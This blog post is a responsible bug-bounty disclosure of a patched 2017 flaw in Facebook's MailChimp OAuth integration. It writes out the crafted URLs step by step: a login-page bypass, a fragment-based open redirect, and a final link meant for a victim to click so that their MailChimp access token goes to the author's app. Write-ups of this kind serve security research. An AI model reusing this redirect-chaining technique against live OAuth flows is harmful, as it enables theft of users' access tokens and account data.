Open in app

Sign in

Write

Sign in

Stealing Facebook MailChimp Application OAuth 2.0 Access Token

Lokesh Kumar
2 min readNov 7, 2017

This post is about an bug that i found on Facebook MailChimp Application OAuth 2.0 which could have been used to steal Access_token. and The Source idea for this bug i got from prakharprasad blog post.

Mailchip oauth 2.0

Facebook Ads Manager can import MailChimp customer data by using OAuth 2.0, to fetch data to Facebook Ads Manager.The application is a part of MailChimp website and it was developed by Facebook Developers. once the MailChimp user authorises the application, it will send MailChimp data to Facebook Ads Manager.

OAuth Authorisation URL for Facebook Custom Audiences :

Request :

https://login.mailchimp.com/oauth2/authorize?client_id=112041070777&response_type=token&redirect_uri=http://mailchimp-oauth.facebook.com/ads/manage/contact_importer_auth/

Response :

https://mailchimp-oauth.facebook.com/ads/manage/contact_importer_auth/#access_token=4uhbf9d433187acg50mk40cef13ec847&expires_in=0

First i tried to bypass redirect_uri but i can’t. then i tried the same oauth flow when i logged out in Facebook. it force me to login page.

https://www.facebook.com/login.php?next=https%3A%2F%2Fmailchimp-oauth.facebook.com%2Fads%2Fmanage%2Fcontact_importer_auth%2F#access_token=4uhbf9d433187acg50mk40cef13ec847&expires_in=0

but /#/ redirection will not work in login.php page. so i need to bypass the default login page .after some search finally found this URL to bypasses default login page. and the /#/ redirection also worked here.

https://www.facebook.com/recover/initiate?hacked=1

Mailchip oauth URL:

https://login.mailchimp.com/oauth2/authorize?client_id=112041070777&response_type=token&redirect_uri=http://mailchimp-oauth.facebook.com/ads/manage/contact_importer_auth/#/n/?https://apps.facebook.com/redirectbug_mailchip

Shorten the Above URL :

https://goo.gl/2Ep6BT

Final URL :

https://www.facebook.com/recover/initiate?hacked=1#/#/n/?business/url/?href=https://goo.gl/2Ep6BT&creative=1

The Victim click the above URL it redirect to Mailchip oauth page and ask for credentials. once the login was success the response access token will be redirect to my Facebook app URL.

The Fix :

Now /#/ redirection will not work for /recover/initiate/ page . so the token will not redirect to other path.

Timeline:

8-June-2017 : Report Sent

15 June-2017 : Further investigation by Facebook

16 June-2017 : Fixed by Facebook

22 June-2017 : $500 bounty awarded by Facebook

Oauth
Facebook Bug Bounty

--

--

Lokesh Kumar

Written by Lokesh Kumar

1K Followers

Web Security Researcher

Help

Status

About

Careers

Blog

Privacy

Terms

Text to speech

Teams